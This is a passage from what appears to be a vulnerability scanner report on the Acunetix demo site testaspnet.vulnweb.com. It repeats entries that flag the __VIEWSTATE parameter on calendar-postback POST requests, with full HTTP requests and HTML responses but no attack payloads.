href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8429&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAy8OLAdsIZGRkkDA%2F6txHVG5TwYnajgfcHT4L8kI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKBm8mOAwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBc%2FEAifmgnb2aqeUGlOjPtsARNx1
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:34 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAy8OLAdsIZGRkkDA/6txHVG5TwYnajgfcHT4L8kI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKBm8mOAwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBc/EAifmgnb2aqeUGlOjPtsARNx1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:White" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8445&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAZ2oeDtsIZGRkwZBD46EUK6fliDw5fVkVfZ4gjhA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKskaT4AwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBVuvZJ0uIAZEZUWGs6E8sOAH0x8B
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:50 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAZ2oeDtsIZGRkwZBD46EUK6fliDw5fVkVfZ4gjhA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKskaT4AwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBVuvZJ0uIAZEZUWGs6E8sOAH0x8B" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:White" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 